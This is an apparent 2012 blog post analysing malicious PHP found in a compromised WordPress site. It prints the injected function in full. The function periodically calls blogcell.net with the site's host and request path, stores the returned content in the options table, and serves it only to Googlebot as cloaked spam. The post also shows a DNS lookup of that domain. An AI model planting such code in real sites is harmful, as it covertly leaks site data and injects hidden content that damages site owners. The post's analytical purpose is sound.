2012-08-06

Specific Exploits

Malicious crackers don't care who you are. They prey and feed on the fact that you think you're so meaningless that you'll never be targeted.

I came across this one exploit that was really interesting. Someone went to some great lengths to get this poor victim.

Code:
function wp_get_footer_meta() {
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'"))
$adwb_opt = unserialize($adwb_opt);
else {
$adwb_opt = array(
0,
''
);
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '" . serialize($adwb_opt) . "', 'no')");
}
if ((time() - $adwb_opt[0]) >= 3600) {
$adwb_host = 'blogcell.net';
$adwb_get = '/wpam/';
$adwb_soc = @fsockopen($adwb_host, 80, $_en, $_es, 30);
if ($adwb_soc) {
@stream_set_timeout($adwb_soc, 30);
@fwrite($adwb_soc, "GET $adwb_get" . '?h=' . urlencode($_SERVER['HTTP_HOST']) . '&u=' . urlencode($_SERVER['REQUEST_URI']) . " HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = '';
while (!feof($adwb_soc))
$adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data, "\r\n\r\n"));
}
@fclose($adwb_soc);
if (preg_match('/(.+?)<\/adbug>/s', $adwb_data, $adwb_tmp)) {
$adwb_opt = array(
time(),
$adwb_tmp[1]
);
$wpdb->query("UPDATE $wpdb->options SET option_value='" . mysql_escape_string(serialize($adwb_opt)) . "' WHERE option_name='adwb_opt'");
}
}
if (eregi("googlebot", $_SERVER['HTTP_USER_AGENT']))
echo $adwb_opt[1];
}

View the Full Source

This code basically makes a request to a remote server and posts the HTTP_HOST and the REQUEST_URI to the target. In case our script fails, it will timeout and the world goes back to rainbows and ponies after 30 seconds.
What really caught my eye?

markizano@localhost:~$dig @8.8.8.8 blogcell.net

; <<>> DiG 9.7.3 <<>> @8.8.8.8 blogcell.net
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 52603
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;blogcell.net. IN A

;; ANSWER SECTION:
blogcell.net. 10962 IN A 192.168.0.1

;; Query time: 28 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Mon Aug 6 17:28:44 2012
;; MSG SIZE rcvd: 46


I did a host lookup on the domain and found that it pointed to an internal IP address. That's right - a public domain record points to an internal IP address. Crazy eh? Ok, maybe not really since anybody can do this. Still, this is a pretty targeted attack; not the typical skiddie stuff you see in everyday cracking.

I'd dox more details about the exploit, but this turns into an inside job. Can't do much on an external network.


-Cheerz

No comments:

Post a Comment